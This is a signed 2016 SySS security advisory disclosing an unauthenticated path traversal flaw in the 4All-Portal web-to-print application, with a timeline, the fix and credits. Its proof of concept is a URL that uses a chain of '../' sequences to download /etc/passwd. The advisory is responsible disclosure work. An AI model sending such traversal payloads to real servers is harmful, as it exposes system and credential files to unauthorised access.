-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2016-042 Product: 4All-Portal Manufacturer: Cross Media - die Daten und Netz GmbH Affected Version(s): Unknown Tested Version(s): 2.7 Vulnerability Type: Path Traversal (CWE-22) Risk Level: High Solution Status: Fixed Manufacturer Notification: 2016-05-13 Solution Date: 2016-09-12 Public Disclosure: 2016-11-29 CVE Reference: Not assigned Author of Advisory: Sascha Muenzberg (SySS GmbH) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: 4All-Portal is a web based web-to-print workflow solution. The software manufacturer describes the application as follows (see [1]): "The 4All-Portal is a highly flexible web-to-print platform for managing, creating and publishing of publications in online and print media. Various modules enable flexible scaling of the software – so that the portal grows with your requirements" Due to improper input validation, the web application is vulnerable to Path Traversal attacks. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: SySS GmbH found out that the web application uses a URL parameter without further input validation inside a file system access. This vulnerability allows an unauthenticated attacker to access arbitrary files on the server. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): The following URL can be used to download the /etc/passwd file: https://example.com/UserManagement/GetMAMGuiAsset?customerName=np&filename=../../../../../../../../../../../../../../etc/passwd ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: Upgrade to version 2.10 or later. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2016-05-03: Vulnerability discovered 2016-05-13: Vulnerability reported to manufacturer 2016-07-13: Manufacturer proposes alternative release schedule 2016-09-12: Public release of fixed version 2016-11-29: Public release of security advisory ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Vendor description of 4All-Portal http://www.4all-portal.net/en/ [2] SySS GmbH, SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy/ [3] SySS GmbH, SYSS-2016-041 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-042.txt ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: Security vulnerability found by Sascha Muenzberg of the SySS GmbH. E-Mail: sascha.muenzberg@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Sascha_Muenzberg.asc Key ID: 0x73033C4F Key Fingerprint: 63FF 27B8 3E36 5475 1C0E CB5D 27C6 0C38 7303 3C4F ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS Web site. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iQIcBAEBCgAGBQJYPAWtAAoJECfGDDhzAzxPHXYQAMuSbgb2k8P4qJuUaq5HqdzA Gbnbriq203lERWcjCxqF2gBa6LHmQ9pPR+lbpWm5/PyTvicZkt4Ck+aKETqWvUzQ 26hazmrx/+T16bu3PYEFJCqOohFKFsJ+UVM03idL4C4gNoGXZYh2hrRHgXoIl5W5 i2rZFfA8oWe23W1X5nw4I81y6CMGIraPUmPJZatQLKRk84ManUReUKNdJ0nKxqU5 eOmmRON0zIg4T/UXYouMc5GG8GHyrWAv5WhU4C7Pjmk4K+2qbbMKEV6cewT7O43x jEhfmr60WwHbSTTIszQ3U5fbRFjfGFYNXa4CnDSXV6IJGwY3fC4kWLWp2DlKw9C7 zwXb738L8rPzwZP+cmfP8yxFmClZC/4qwN2dSAJC/LWXjKBEB0sk0vggV6qqlnfQ /JWEGE6WwWMpLVXR4fcgvzKpgbGfy6jrTmKrRWSV4gXjWF6id0gd4eFq8KZiApYT hJhxS9Tsq7yvsiCt310IbxkA1AzKiZ/VPEnfs1VYlHwrr0x9Cns2tpkiDbwm1mK1 W4MvwnzCMjSb/Ds/rPiv7uIxGZThgUdoCQxmoLskSHPa2RY868gQ6d5d3oyJiils QFYJvqLgb/v1Oa5dbQD5oo4l0L2jz6Bz0HFcvJMlDEMm0ljQqHbUA2b0J1MY2wvS FgDgviQhSvJ4KLazDA/C =0ZIN -----END PGP SIGNATURE-----